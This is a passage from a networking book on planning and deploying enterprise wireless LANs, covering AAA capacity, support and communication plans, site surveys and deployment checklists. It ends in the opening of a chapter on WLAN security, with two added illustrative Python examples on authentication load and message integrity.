(whether AC sockets or Power over Ethernet ports on your switches). Additionally, if your architecture
calls for a dedicated wireless switch or WLAN controller, ensure that your existing infrastructure supports
it or any additional integration testing, equipment, and design has been completed.

Provision AAA Capabilities
Ensure that the AAA architecture is in place, tested, and functioning. It's important not to end up testing
your AAA system on the first day of production services. Stress test the AAA solution. Depending upon
the size of your client base and the mobility, you may see a dramatic increase in the number of
authentication transactions. Be sure that your AAA servers are capable of supporting the additional load
created by roaming clients. You may also be deploying your WLAN across geographically disparate
locations, either nationally or internationally. Investigate whether you need to place AAA servers at other
locations to ensure service stability or to avoid WAN congestion.
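To put a rough number on the roaming and credential-expiry load described here, and on the relief that the fast roaming described under "Authentication" earlier in this section provides, the following added Python estimate (not from the book; the client counts, roam rates, start-of-day window, and per-server capacity are all constructed assumptions) models back-end AAA requests per second with and without a fast-roaming cache and the number of servers needed at a given headroom.

```python
"""Back-of-envelope AAA load estimate for a WLAN (added illustration, not from the book).

Two sources of back-end authentication traffic discussed in the chapter are modeled:
  * roaming: each AP-to-AP move re-authenticates the station unless the AP or
    controller answers it from its fast-roaming cache, and
  * credential expiry: a stationary client still re-authenticates when its
    authenticated credentials time out.
All figures below are constructed sample inputs; the per-server capacity in
particular is a placeholder that the recommended stress test should replace.
"""
import math
from dataclasses import dataclass


@dataclass(frozen=True)
class WlanProfile:
    clients: int                   # stations associated during the busy hour
    roams_per_client_hour: float   # average AP-to-AP moves per station per hour
    reauth_interval_min: float     # credential lifetime enforced by policy, in minutes
    fast_roam_hit_rate: float      # fraction of roams served locally (0.0 = no fast roaming)


def expiry_reauth_per_second(p: WlanProfile) -> float:
    """Re-authentications caused purely by credential expiry."""
    return p.clients / (p.reauth_interval_min * 60.0)


def roam_reauth_per_second(p: WlanProfile) -> float:
    """Re-authentications caused by roaming that miss the fast-roaming cache."""
    roams_per_second = p.clients * p.roams_per_client_hour / 3600.0
    return roams_per_second * (1.0 - p.fast_roam_hit_rate)


def aaa_requests_per_second(p: WlanProfile) -> float:
    """Steady-state requests reaching the back-end AAA servers."""
    return expiry_reauth_per_second(p) + roam_reauth_per_second(p)


def startup_burst_per_second(p: WlanProfile, window_min: float) -> float:
    """Peak rate if every client performs a full authentication within a start-of-day window.
    Fast roaming does not help here: first authentications always reach the AAA server."""
    return p.clients / (window_min * 60.0)


def aaa_servers_needed(p: WlanProfile, server_capacity_per_s: float,
                       startup_window_min: float = 15.0, headroom: float = 0.5) -> int:
    """Servers required so the worse of steady-state and start-of-day load
    stays within (1 - headroom) of the measured per-server capacity."""
    if not 0.0 <= headroom < 1.0:
        raise ValueError("headroom must be in [0, 1)")
    peak = max(aaa_requests_per_second(p), startup_burst_per_second(p, startup_window_min))
    usable = server_capacity_per_s * (1.0 - headroom)
    return max(1, math.ceil(peak / usable))


def fast_roaming_saving(p: WlanProfile, hit_rate: float) -> float:
    """Fraction of steady-state AAA load removed by a cache with the given hit rate."""
    with_cache = WlanProfile(p.clients, p.roams_per_client_hour, p.reauth_interval_min, hit_rate)
    return 1.0 - aaa_requests_per_second(with_cache) / aaa_requests_per_second(p)


if __name__ == "__main__":
    # Constructed campus: 5000 stations, six roams per station per hour,
    # credentials expire hourly, no fast roaming.
    base = WlanProfile(clients=5000, roams_per_client_hour=6.0,
                       reauth_interval_min=60.0, fast_roam_hit_rate=0.0)
    print(f"steady-state load without fast roaming: {aaa_requests_per_second(base):.2f} req/s")
    print(f"saving with a 90% fast-roaming hit rate: {fast_roaming_saving(base, 0.9):.0%}")
    # Placeholder capacity of 5 full EAP exchanges per second per server; measure yours.
    print("servers needed:", aaa_servers_needed(base, server_capacity_per_s=5.0))
```

Even with a high fast-roaming hit rate the start-of-day burst still sizes the AAA tier, which is why the stress test recommended above should include a cold-start scenario and not only steady-state roaming.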

Define Security Standards and Policies
Make sure your security standards and policies are defined, published, and clearly communicated to your
users. For example, you may have decided that wireless networking hardware is prohibited unless
installed by your IT department, yet discover that certain departments or workgroups are already using
self-installed networks when your deployment team arrives onsite. Besides being a security liability
equivalent to rogue access points, this will cause problems during the site survey and disruption to the
productivity of the workgroup involved. It is important that you share your plans, policies, and
procedures before you begin because this will avoid unnecessary confusion among your user
community.
The following sections clarify the differences among security standards, policies, and procedures.

Security Standards
Security standards are industrywide and are defined by external bodies such as IEEE or the WiFi Alliance.
802.11i is an example of an IEEE standard. WPA (WiFi Protected Access) is an example of a WiFi Alliance
standard. Security standards define technical specifics on how security controls are applied or
implemented by wireless hardware, and sometimes how compliant devices must interact and operate
with each other.

Security Policies
Security policies are the management, business, and technical decisions that your enterprise has made
regarding wireless security. For example, you may have a wireless security policy that states that only
your IT staff members are permitted to install access points. You may have decided that only devices
that support WPA (a cross-industry WLAN standard) are allowed on your network; that would be a policy
defining what standard is to be used on your network.

Security Procedures
Wireless security procedures are business processes that dictate how your staff members handle and
deal with specific events. It is no use defining what standards should be used or restricting what devices
are permitted unless your staff members know what to do when these standards and policies are
contravened. Wireless security procedures can effectively be thought of as "operating instructions" on
what your staff should do in certain circumstances.

Put the Support Plan in Place
Make sure you have clearly defined a support plan and that your IT staff understands it. This defines
how your user population is supported, who they call, how their questions are handled, and so on. For
example, your support plan should detail who staff call with problems (usually a helpdesk of some sort),
what level of technical expertise the helpdesk should have, how they handle cases they cannot answer,
and to whom they escalate. It effectively should define who shall provide frontline, second line, and
third line escalated support; this is also known as Tier 1, Tier 2, and Tier 3 support.
As you deploy your solution, you will almost certainly enable each site in turn. The initial period of user
adoption and familiarization is perhaps the most turbulent and support-intensive in any solution lifecycle.
Your users will undoubtedly require and request support, training, perhaps electronic learning, and
maybe even simple presentations on the benefits of the new technology. Many deployments have failed
or resulted in poorer than expected adoption simply because the IT department installed the
infrastructure and "walked away." Your support staff, whether the IT department itself or a dedicated
support desk, must be aware of the project, appropriately trained, and capable of resolving the most
common errors.

Put the Communication Plan in Place
Always think about the customers. In this case, the customers are the users of the WLAN. Users like to
be kept informed and are more willing to embrace a technology or solution if they understand both its
benefits and limitations. Make your users aware of what the WLAN solution provides, when it shall be
made available at their sites, how to use it, and where to turn for help. Not only will it help market the
WLAN to your end users, but it will also ensure that they understand the benefits and goals of the
solution. User satisfaction is an often overlooked but very important factor in any successful technology
solution.
Make sure your users are aware of the deployment schedule. Not only will this help manage their
expectations, but it also will help avoid constant support calls requesting service and dissatisfaction on
the progress of implementation. It may even help avoid or reduce rogue deployments.
Explain the basics of WLAN security and networking concepts. Many users will be vaguely aware of
security concerns associated with wireless. Some will have no experience with the technology and may
be skeptical of its benefits. Others may be early adopters who have already embraced the technology.
By sitting down and sharing a broadly based communication plan, you can inform your users of the
project's goals, who and what will be supported, and when they can expect service at their location.
Clearly state what is permitted and what is not. Then explain why. Most users will modify their behavior
if they fully understand the repercussions of their actions and will gladly conform to security policies if
they understand that they are based upon sound business reasons and not simply diktats from a
shadowy IT or Information Security department.
With the advent of cheap access points, the likelihood of self-installed, rogue deployments has increased
dramatically. Users should be made aware of the risks associated with non-IT endorsed solutions, the
risks of enabling ad-hoc wireless networking, why enabling both wired and wireless interfaces on their
computer at the same time is not recommended, and so on. You should also consider going one step
further and offering your staff basic instructions or "best practices" on how to securely configure their
own home wireless networks.
Develop and publish FAQ (Frequently Asked Questions) sheets. Identify what you believe will be the top
10 or 20 questions from users and make this available via e-mail, a company internal website, or even in
hardcopy during client distribution.
Finally, you may also wish to develop electronic learning collateral. The larger your corporation and
deployment, the more likely you will already have an official internal training and learning service
available. Even if you do not have such a division, producing simple and relevant material is worth the
time and effort. You may consider creating a solution web page or "dashboard" on an internal corporate
intranet. This would be an ideal location for communication and training collateral and somewhere to
refer interested users for project updates and schedules.

Address Regulatory Issues


Some locations have specific regulatory requirements. The number of 802.11b channels available can
even change depending upon the country in which you install WLAN equipment. In the United States,
the Federal Communications Commission (FCC) regulates equipment that is permitted in the 802.11
frequency bands. In Europe, it is the ETSI, or the European Telecommunications Standards Institute. No
matter where you deploy, chances are that regulations are governed by a regulatory agency, the most
common of which are listed here:
United States: FCC
Europe: ETSI
Canada: Industry Canada
Taiwan: DGT
Japan: TELEC
China: MII
India: DOT
It is important to familiarize yourself with local regulatory requirements and ensure that your network
complies with the appropriate legislation.

Management
Ensuring that you have a robust management system in place is as important as its design and
implementation. After you have installed the infrastructure, distributed the clients, and enabled the
solution, you will have ongoing management to consider. This is especially important in large
deployments, where it is not uncommon to encounter several thousand access points and tens of
thousands of clients. It is therefore prudent to also consider this during the design and implementation
phase. Chapter 8, "Management Strategies for Wireless LANs" covers this topic in much greater detail.
However, a brief overview is provided here.
There are two facets to managing an enterprise-class wireless network:
Managing the infrastructure
Managing the clients

Managing the Infrastructure
Infrastructure issues will include configuration management, image (or firmware) maintenance,
maintenance and security settings updates, and so on. Many enterprises will already have an existing
network management solution in place. Ensure that your wireless infrastructure can be seamlessly
integrated with this system.
Wireless networks also pose unique challenges, such as radio management, rogue AP detection, and
radio optimization. Several wireless equipment manufacturers produce management toolsets specifically
geared toward their WLAN products. If you choose to deploy these, you should consider how to integrate
them with any existing network management platform you have and where to locate the management
servers/appliances. (If you have a geographically dispersed environment, carefully decide where to place
it in your infrastructure as it will have a direct impact on performance.) You should also ensure that your
IT and support staff have appropriate training with the toolsets provided.
Retrofitting a management platform after your infrastructure deployment is complete will be both costly
and resource intensive. It makes much more sense to consider this as part of the standard deployment
process.

Managing the Clients


Client management is very important for all large-scale wireless deployments. As your WLAN grows and
evolves, you will probably need to revisit client devices at some stage. Security settings may need to be
changed, user and security profiles distributed or modified, or firmware and client software updated. If
you have several thousand clients, this can be extremely resource intensive and therefore costly.
Although it is true that most of your client settings can be configured during the initial client distribution,
you should also plan for some manner of updating and managing your clients in the future. Many
corporations already have client management software available to handle their desktop systems, such
as LANdesk, Altiris, Microsoft SMS, or Symantec LiveState. If appropriate, ensure that the existing client
management platform can handle updating your wireless software. Alternatively, some wireless solution
manufacturers provide administrative and management toolsets with their software that is dedicated to
updating and managing wireless client software and devices. If you choose to use these, ensure that
your support and desktop engineering staff are familiar with them.

Support
By their very nature, wireless networks are complex and susceptible to interference and potential
service-impacting factors that wired networks avoid. A carefully designed WLAN, and the use of the
latest intelligent WLAN equipment, will help avoid these problems. However, you will undoubtedly
encounter specific wireless-related issues during the support of your solution.
It is important that you develop a clear technical support framework. Your technical support staff should
be trained in common wireless-related problems, and a tiered support structure is recommended, as
follows:
Tier 1 (or helpdesk support) should be familiar with common WLAN problems and issues.
Tier 2 is usually a support team that handles more complex problems escalated by the helpdesk;
this tier is often made up of IT engineers or analysts who were personally involved in the
deployment or who have been specifically trained in wireless networking issues.
Tier 3 support may be a senior team of wireless or networking experts, or it may denote an
escalation path to the actual solutions provider or equipment manufacturer.
Regardless of the possible installation of management hardware or software, your support framework
should be in place before you commence deployment. As mentioned elsewhere in this chapter, the initial
adoption phase will be the most support intensive, and you will undoubtedly see a spike in the number
of support calls and cases during this time. Your support staff, whether you have a tiered framework or
not, should be prepared for this and ready to assist your users.

Deploying the WLAN


Deploying your WLAN will likely be a complex process-driven effort. It will require careful project
management and scheduling to ensure smooth transitions between each set of tasks. In this, it is not
unlike any other technology implementation once the architecture and design have been defined.
There are usually multiple groups or teams involved in a WLAN deployment. These will include your core
IT wireless team, your cabling vendor, the group responsible for workplace resources (power,
occupational health and safety, office management, and so on), your technical support organization,
network operations staff, and any external vendors you select to assist in the deployment. Large
enterprises will most likely also have a program management team to oversee the multiple installations
and sites, manage the multiple projects, report to the stakeholders, and control costs. Although the
program management team may not be considered an integral part of the deployment per se, it will
likely be involved in the day-to-day implementation.
Figure 6-2 shows the relationships among groups involved in a typical deployment. It is important to
carefully manage these relationships and ensure that good project management techniques are used to
avoid unnecessary delays or problems.

Figure 6-2. Possible Deployment Teams and Their Relationships

The following section describes some of the key tasks and activities required during the deployment
phase.

Pre-Deployment Tasks
At this stage, you should have decided whether to use external vendors to assist in the deployment. If
you have chosen to use external vendors, ensure that they are familiar with your existing network
infrastructure, the scope of deployment, the locations of each site, and the fundamentals of your
wireless architecture. Some time spent on transferring information to your vendor will help avoid later
confusion and delays.
Independent of retaining outside help, you should have a detailed project plan and implementation
schedule in place. The relevant IT resources should be assigned, and the team should be familiar with
the architecture. It is possible that a pilot network will have been undertaken to validate your
architectural decisions, familiarize your IT staff with the technology, and test the solution. Indeed, for
larger deployments, a pilot is highly recommended.
A communication plan should by now have been undertaken, and your end users should be aware of the
upcoming technology, your security standards and wireless policies, when they can expect to receive
their client hardware (if necessary), and when the service will be launched at their site.

Managing the Deployment


The actual deployment of the WLAN will most likely follow a number of common steps for each site. The
makeup of the teams involved will depend upon your choice of IT staff, the use of internal staff or
external vendors, and whether local resources are available. Each set of tasks should be assigned to a
team, yet all teams should understand the entire end-to-end process.
Figure 6-3 shows a typical process flow for common tasks in a large multisite deployment. The list is not
intended to be all-inclusive but rather is indicative of the process flow and task assignment you will likely
encounter. The illustrated case uses a WLAN solutions provider (the "vendor") to provide additional
project resources. Even if you use your own internal resources for the entire project, the tasks and
process flow would remain roughly the same.

Figure 6-3. Example Site Installation Process Flow



Site Data Collection and Validation


Ensure that you have a comprehensive list of all sites in which you will deploy. Site contacts (local IT
staff, reception, shipping, health and safety, and office management) should be collected in a "site
database" or contact list, including phone, fax, and e-mail addresses. A "site owner" could be assigned
from your IT team. This person would be responsible for configuring the devices or managing the
specific site installation; alternatively, a project manager can fill this role.
Ensure that you have details such as office opening and closing times, local delivery restrictions, and any
upcoming events such as office closures, construction, vacations, and so on.
Finally, it is recommended that you source or produce current floor plans for your office. You should note
the location of all cabling (if possible), power outlets, and ideally the composition of internal walls,
because these will affect WLAN signal strength, and ultimately quality and throughput. This information
is useful during the site survey phase. Most of this information can be found in architectural or office
blueprints if you have them.

Local Infrastructure Upgrade or Modification


Have your site owner (the IT staff member responsible for the site) take stock of existing infrastructure
at each site before your installation team visits. The site owner should do the following:
Confirm that there is enough inline power or power points available
Make sure that you have sufficient rack space
Ensure that you have enough switch ports available
Verify that you have sufficient console ports available if you are cabling the access points for
console access
Much of this is predicated upon earlier architectural decisions, but it is important that you collate and
validate information on each site to avoid surprises later.
If you do not have sufficient infrastructure capacity, you should plan to modify, upgrade, or install what
you need before the first site visit by a WLAN team. This in turn will affect your project plan and
resource requirements. In other words, make sure the supporting or foundational enabling infrastructure
is capable of supporting the access points and controllers. Don't leave yourself vulnerable to discovering
halfway through an installation that you've run out of Ethernet ports on your switch, for example.

Firmware and Configuration Updates


Ensure wireless network adapters have the latest firmware and software drivers. This may require
manually flashing each card or downloading the latest software. The same is true for embedded wireless
clients (such as those in ASDs or embedded wireless cards in newer-model laptops). Note that for large
deployments of several thousand client devices, updating firmware and software drivers becomes an
increasingly complex and time-consuming challenge. We recommend a structured and tested approach
for managing such environments. Refer to Chapter 8 for recommended practices.

Client Distribution
Understand how you will distribute the cards and software. You may wish to ship client adaptors to a
local mailroom or IT contact for each site and delegate the distribution among your users to them.
Alternatively, you may use internal mail to send client hardware to each user individually, or you may
select a "client pickup" model. Ensure that your users and local staff are aware of which option you
choose. Also ensure that you provide training or informational collateral to your users at this stage;
FAQs and installation instructions are usually included.

Shipping and Handling


Assign responsibility for actual shipping of hardware to each site. This includes not only the client
adaptors as described in the preceding section, but also the access points and any wireless switches or
dedicated hardware you may need. If you need to upgrade local infrastructure, make sure it is
dispatched and installed before the wireless equipment.

The management of shipping and handling alone can be a significant administrative overhead, especially
in international deployments. Ensure that you have a team that is familiar with this process. Expect
customs requirements (and delays) and plan accordingly.
Decide on whether and where you will maintain a stock of standby and replacement equipment, for
example, at each site or in a centralized location.

Site Survey
The site survey is perhaps the most important of all deployment tasks. This process dictates where you
will locate the individual access points to provide the level of service you have defined in your
architecture. The throughput you require for your applications and the estimated number of concurrent
users will provide you with a rough estimate of the number of access points you will need per floor or
site.
Your solutions architecture, or automated WLAN management tools, will dictate such issues as desired
cell overlap, throughput required to support your applications, user to access point ratio, radio
transmission power, and whether you lock your access points to a single speed (data rate). Using this
information in conjunction with the floor plans you collected earlier will allow you to plan for the number
of access points per site. No amount of planning can account for environmental issues impacting your
WLAN, local site interference, or attenuation caused by internal office construction. You must install the
access points in locations and configure their settings such that they actually provide the service you
require. A formal site survey will validate this information and find the most appropriate location for the
access points.
Site surveys can typically be undertaken in two ways:
Automatic
Manual
You may select an automatic site survey (sometimes called RF Prediction) and use tools provided by
your WLAN equipment vendor to configure the access points once they are physically installed. These
WLAN management products (like the Cisco Wireless LAN Solutions Engine or Wireless Control System)
not only offer assisted or semi-automatic site survey capabilities but also allow you to import floor plans
to get a visual representation of your WLAN, interference, client data, and so on. The access points are
then powered up, and the centralized wireless controller or management device auto-discovers and
auto-configures them with optimum settings.
In some circumstances, an automatic or assisted site survey may require you to take measurements at
various locations throughout the floor to add additional data points. These can help improve the
accuracy and appropriateness of the automatic configuration settings. Finally, some WLAN products (like
the Cisco Centralized WLAN Solution using wireless LAN controllers) automate the access point
configuration entirely and your IT staff need not configure them at all. This can offer significant savings
in time, effort, and expense because your IT staff members do not have to be wireless experts or spend
time configuring each access point.
The traditional site survey technique calls for a manual process. The engineers choose locations for the
access points based upon "best guess," taking into account the floor plan, the transmit power, and cell
overlap defined by the design and then temporarily place access points in these locations. They then
perform a walkabout measuring the signal strength, cell size, and roaming characteristics using a
wireless site survey software application. This can be the software provided by the WLAN equipment
manufacturer (such as the site survey utility Cisco bundles into its software) or a third-party tool
designed specifically for site surveys or wireless diagnostics, such as AirMagnet. If any dead spots are
discovered, or if the signal strength and overlap do not meet the defined characteristics, the access
points are moved and fine-tuned. Challenging environments like factories sometimes employ external,
more powerful or directional antennas.
Whatever survey strategy you select, the output is the same. The result is a list of access point locations
and settings that provide the coverage and bandwidth you need for that individual site. The list is then
used by the implementation team to identify the exact placement of access points during the
deployment, as well as by operations staff as an asset log for troubleshooting purposes.
It is important for you to document the site survey. Create a "site pack" for each location, which includes
copies of the floor plans, showing the final locations of the access points, a table of all access points with
information on their name, configuration (transmit power, channel, antenna type, and so on), and details
such as their switch and console port number. It is also useful to include a digital photograph of the AP
location. Don't forget to update the site-pack whenever changes are made or new access points are
installed. An outdated site-pack can cause more problems than none at all.

Cabling
Once you have calculated the position of the access points, you must cable each location. Typically, this
will require the use of plenum-rated cable (cable certified for fire resistance) to enable you to string the
cable through raised floors or dropped ceilings. Each access point will require at least one network cable.
If you have opted to provide console access to your access points, an additional cable will be needed.
Console access will allow you to engage in out-of-band management and troubleshooting.
Finally, you will need to ensure that the access point is provided with DC current. This may require the
installation of an AC mains power socket at or near the access point location. Alternatively, you can
power some access points with inline power that is provided by the network switch via the Category 5
twisted pair cable. This is known as Power over Ethernet.

Access Point Installation


Next comes the physical installation of the access point. You may choose to fit the access points to office
walls or building columns or hide the access point in the dropped ceiling and only leave the antennas
visible. Special plenum-rated metal or NEMA enclosures are also used and are sometimes required for
manufacturing or industrial areas. In any case, this is when your team physically installs the access
point, connects it to the cabling previously laid, and powers up the device.

WLAN Controller Configuration


In centralized WLAN solutions, the WLAN controllers themselves need to be configured. This is often
undertaken around this stage, typically before the physical installation of the access points. The WLAN
Controllers are configured with appropriate settings for each building or site. This can be done on-site or
before the controllers are dispatched.

WLAN Controller Installation


In centralized WLAN solutions, the WLAN controller should now be physically installed. This is important
because it is this device that actually configures, manages, and "controls" the access points themselves.
Without the controller present and operating, the access points will not function.

Access Point Configuration


Now that the access point has been physically installed, connected to your network, and powered, you
can finalize its site-specific configuration. Depending upon the product you have deployed, access point
configuration (and management) may be handled automatically by a so-called WLAN controller or WLAN
switch, or you may need to configure the access points individually.
Access points that require individual configuration can be handled by your WLAN deployment vendor (if
you have chosen one) or your own internal IT staff. In the former case, you will need to provide network
access to your vendor, along with configuration details and security settings. As a result, many
enterprises prefer to carry out this step themselves.
Access points that are automatically configured by a WLAN controller or WLAN switch are usually easier
to deploy. Each model (centralized, WLAN controller-based, or distributed, access point-based) has its
advantages and disadvantages that you will have examined and evaluated during your architecture
phase.

Testing
Once the access points have been installed and configured, you are ready to begin testing. This is a vital
step in any deployment, as this allows you to detect any potential problems before the service is
launched. This, in turn, avoids unnecessary support costs and helps reduce the TCO. Larger, multisite
deployments may justify formalizing this into a systematic post-installation acceptance test, but even
smaller-sized deployments should undertake some tests. The test plan should include
Connectivity of access point to rest of the network
Successful authentication (login)
Successful roaming from AP to AP
Throughput testing
Validation of cell overlap
Validation of coverage

Include a copy of the post-installation acceptance test as an addendum to the site survey document.
That way you not only have a written record of the WLAN installation for that site, but you also have a
copy of the test validating the settings and AP locations. This can be particularly important for wireless
networks because many factors can change the environment. Troubleshooting may be aided by
understanding what was known to work at the time of installation.

Client Installation
One of the final tasks that you must undertake is the actual installation of the client adaptors and
software. This may require your users to self-install the software from a centralized server, or they may
have the software preinstalled on their laptops. Many large enterprises have automatic software
distribution frameworks (such as those provided by LANdesk, Microsoft SMS or Altiris), and these can be
used to good effect. Even though some operating systems support wireless networking natively (such as
Windows XP and MacOS), we recommend using dedicated client software provided by equipment
manufacturers if possible as they provide richer feature sets and more detailed configuration capabilities.
These tend to have significant additional features that both users and IT staff find useful.
Today, the majority of devices will have the wireless adaptor already embedded. This includes newer
laptops and many ASDs. However, some devices may require you to provide a wireless adaptor, usually
a PC card (PCMCIA) or sometimes a USB or CompactFlash card. The form factor is not important; rather
it is a controlled method in distributing these to your user base. Ensure that the adaptors have been
flashed and have the latest firmware, drivers, and software. This may present an additional challenge for
embedded clients but should not be overlooked.
When you are distributing the client adaptors or software, make sure to provide a communication pack
to the user. This should include FAQ, some information on the wireless technology and security you are
adopting, the goals of the solution, and basic instructions on how to use the service, including calling
technical support.

Production Launch
Your site is ready for production services. You have performed the site survey, installed the equipment
and supporting infrastructure, configured the wireless settings, tested the service, distributed the client
hardware, and communicated the status to your end users. Expect an initial surge of interest in the
service and a high number of technical support calls. Ensure that your technical support organization is
aware of and expecting any impending site launches. Ideally you should avoid too many service
launches within a short period of time, because this will allow your first- and second-line support teams
to handle the spike in cases. You may also encounter a few teething problems because production status
may highlight some overlooked configuration errors and provide much more intensive "stress testing."
You should allow for some technical resources (second- and even third-level support) to be available
during the first week or two of usage. Close monitoring of the service is also recommended in the early
stages. This will enable you to validate the design and detect problems early.

Deployment Checklist
This section includes proposed checklists of minimum activities and considerations recommended during
the design, deployment, and implementation of a wireless LAN solution.
The aim of this checklist is to prompt you to consider all aspects of the deployment, and not simply the
physical installation of the infrastructure. Each step should be considered a specific project deliverable,
process, or document.
The following checklists are not to be considered all-inclusive, but are examples only. Please refer to the
appropriate chapters that cover planning and preparation (Chapter 3), supplementary services (Chapter
4), architecture (Chapter 5), security (Chapter 7), and management (Chapter 8) for more detailed
discussion. Note also that every installation is unique.

Architecture
Use the following checklist as a guideline when considering your network architecture:
Determine whether the WLAN is a mobility/productivity enabler or simply another transport
medium.
Determine whether a pilot deployment is required, or proceed to full-scale deployment.
Based upon preceding points, define internal support SLAs.
Define WLAN architecture.
- Centralized controller-based solution versus distributed autonomous AP solution
- Traffic/application type
- Selection of standard (802.11a, 802.11b, 802.11g, etc.)
- Scalability
- Single site
- Campus
- National deployment
- Global deployment

- Security
- Open (not recommended)
- Static WEP (not recommended)
- Dynamic WEP (that is, EAP-based)
- 802.11i / RSN
- VPN overlay
- AAA integration
- RF planning
- IP address scheme
- Wireless VLANs
- Data
- Voice
- Guests
- User to access point ratio
- Quality of service (QoS)
Document final architecture.

Deployment Methodology and Project Planning


Determine deployment resource requirements using the following checklist as a guide:
Outsource to trusted vendor or handle with internal staff.
Identify project dependencies.
- Wired network infrastructure (complete if necessary)
- Power
- AAA (install if necessary)
- Security posture defined
- Security standards and policy

Produce project plan.


If using vendors:
Identify vendor capabilities.
- Cabling vendor
- Solutions provider
- WLAN certified experts
Delineate vendor/in-house responsibilities and workflow.
Define vendor SLA and contract.
Document vendor work orders, including engineer instruction sheets.
Define site survey documentation requirements.
Define and document post-installation acceptance test.

Clients
Consider the following points about your clients:
Enumerate number of clients and platform.
Decide on client form factor.
Ensure client interoperability.
Purchase client adaptors (if necessary).
Ensure client adaptors are at latest firmware level and "flash" if necessary.
Define client adaptor distribution method: pick-up model vs. distribute model.
Define client software distribution method.
- Individual user installs
- Centralized software distribution method (Altiris, SMS, etc.)
- Recall model
- Self-service model

Educate users.
- Deployment characteristics
- Application support
- Coverage area
- Roaming issues
- Develop user FAQs
- Communication plan
- User training sessions
- Self-service web-based training
Implement support plan.
- Educate enterprise helpdesk
- Tier 1, Tier 2, and Tier 3 support
- SLAs
- Vendor support agreements

Infrastructure
Use the following checklist as a guide when considering your infrastructure:
Purchase hardware (for example, APs, switches, and so on).
Identify firmware level of hardware and "flash" if necessary.
Manage the network.
- In-house
- Appliance
- Third party
Establish naming conventions.
Differentiate inline power vs. AP power supplies.

Determine whether APs will be cabled for console access.


Secure the access point.

Deployment
Consider the following points regarding your deployment:
Carry out site survey (in-house or vendor).
Produce site survey documentation.
Determine cable AP locations (data, console, and power, if applicable).
Install WLAN controllers (if appropriate).
Install APs.
- Physical security
- Location (visible vs. concealed)
- Labeling
Configure APs.
- If required, apply standard configuration (IP address, shared secret, host name, and so
on): Individual vs. network management method
- Integration into network management system
Configure access/distribution network.
- Switches
- VLANs
- Console servers
Perform post installation test: In-house vs. vendor.
Move into production status.
Complete client distribution if necessary.

Summary
In this chapter, you have learned that a structured and carefully planned approach to the actual
deployment of WLANs is important. Take time to consider all the tasks that lie ahead of you. If you are
embarking on a major deployment, you may wish to consider outsourcing some of the tasks and
responsibilities to a third-party wireless integrator. If you choose this option, make sure you explicitly
define roles and responsibilities, ensuring that each party is fully aware of the end-to-end process.
Involve all members of your extended team in the deployment process, and do not limit it to IT.
Technical support, workplace resources, finance, and even HR have parts to play. The call for teamwork
also exists within the IT organization. Wireless projects generally require groups responsible for user
databases, client support, networking, and security to work together. In some cases, a wireless project
might be the first time people from these different organizations have had to work together.
Create a clear and concise client communication plan to keep your user base informed. Define the actual
deployment checklist for each site and ensure a consistent approach for each installation. This will save
you time and money throughout the deployment.
A careful site survey (manual or automated) is a must for a successful solution, and you should ensure
that you maintain clear and comprehensive documentation. Upon completion, test the installation and
document all results in a "site pack" for each location. Finally, when launching the service for each site,
plan for a higher-than-normal number of technical support calls as users become familiar with the
technology and any bugs are ironed out by your technical team.

Chapter 7. Security and Wireless LANs

The purpose of this chapter is to provide you with enough information to tackle the challenge of securing
your WLAN infrastructure. This book repeatedly mentions the need for a security posture because
security in your network is only as strong as the weakest link. This chapter provides an overview of key
security components in WLANs, fundamental security vulnerabilities, key WLAN security standards, and
security management challenges.

Wireless Security in Your Enterprise


The fundamental premise of security in networked environments is that no network is truly secure. Even
a network that is not connected to the Internet can be compromised if physical access can somehow be
obtained. This further drives home the point that there is no perfect way to secure a network.
To approach security, you need an awareness of the components that determine how to secure your
infrastructure while maintaining an attitude of elevated paranoia. You should always assume that at
some point in time there will probably be an attempt to break into your network with the goal of
compromising intellectual property or disrupting your business.
Attacks don't necessarily come from the outside. Research from the Computer Security Institute (CSI)
and the FBI has shown that most security attacks come from the inside of an enterprise:
(http://www.gocsi.com/forms/fbi/csi_fbi_survey.jhtml). (The document is free after registering at the
CSI website.)
These attacks can be intentional, such as one by a disgruntled employee, or unintentional, as in the case
where a computer is infected by a virus. The unintentional act is more likely to happen and probably more
destructive. Armed with this state of healthy paranoia, you can strike the delicate balance between how
much you invest to secure your infrastructure and the degree of difficulty an attacker needs to
overcome.

Thinking Securely
The broadcast nature of a wireless network effectively raises the importance of authentication,
encryption, and hashing. Starting with authentication, you want to be sure that only permitted parties
can communicate with your APs. Because you are effectively broadcasting your message over the ether,
everyone can potentially hear every communication. Encryption is, therefore, needed to ensure
communication privacy. Finally, the broadcast environment makes it relatively easy to capture, modify,
and resend a message. Hashing your messages addresses this problem.
Literature on information security typically uses the example of communication between two people. This
section does the same, using the example of communication between Tony and Kelly. The specific
security challenges that Tony and Kelly face when communicating are
Tony and Kelly need to know that they are indeed communicating with each other. This is known as
authentication of the communicating parties.
Tony and Kelly want to be sure that only they can interpret the message exchange. Encrypting the
messages into ciphers that only Tony and Kelly can decipher achieves this goal. Keys are used to
lock and unlock the messages. These keys can be static or dynamic, and symmetric or asymmetric
(Public/Private). The combination of the respective key characteristics determines how secure the
solution is but also the computational cost.
Finally, Tony and Kelly want to be sure that the messages have not been tampered with while the
messages were in transit. This is achieved by attaching a checksum (hashing) to the message that
is recomputed and compared upon receipt. If the checksum is the same, the messages have not
been tampered with.
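The Tony and Kelly exchange above, carried through in runnable form as an added example (not code from the book): a shared symmetric key gives authentication through a keyed checksum (MAC), a keystream gives privacy on the air, and recomputing the checksum on receipt catches any change made in transit. It also shows the caveat a practitioner would add to the "checksum" point: an unkeyed hash appended to a message can be recomputed by whoever alters it, so the checksum must depend on the shared key. The key, nonce and HMAC-based stream cipher are constructed for illustration only.

```python
"""Tony and Kelly: authentication, encryption and integrity over a broadcast
medium. Added illustration, not code from the book. Assumes a static symmetric
key agreed out of band; the HMAC-SHA256 counter-mode stream cipher is for
illustration, not a production cipher."""
import hashlib
import hmac
import secrets
import struct
from typing import Optional

NONCE_LEN = 16   # per-message nonce so identical plaintexts differ on the air
TAG_LEN = 32     # HMAC-SHA256 output length

# Constructed shared secret for the example (a static, symmetric key in the
# section's terms, known only to Tony and Kelly).
SHARED_KEY = hashlib.sha256(b"constructed example key for tony and kelly").digest()


def _subkey(key: bytes, label: bytes) -> bytes:
    """Derive separate encryption and MAC keys from the one shared key."""
    return hmac.new(key, label, hashlib.sha256).digest()


def _keystream(enc_key: bytes, nonce: bytes, length: int) -> bytes:
    """Counter-mode keystream: concatenated HMAC(enc_key, nonce || counter) blocks."""
    out = bytearray()
    counter = 0
    while len(out) < length:
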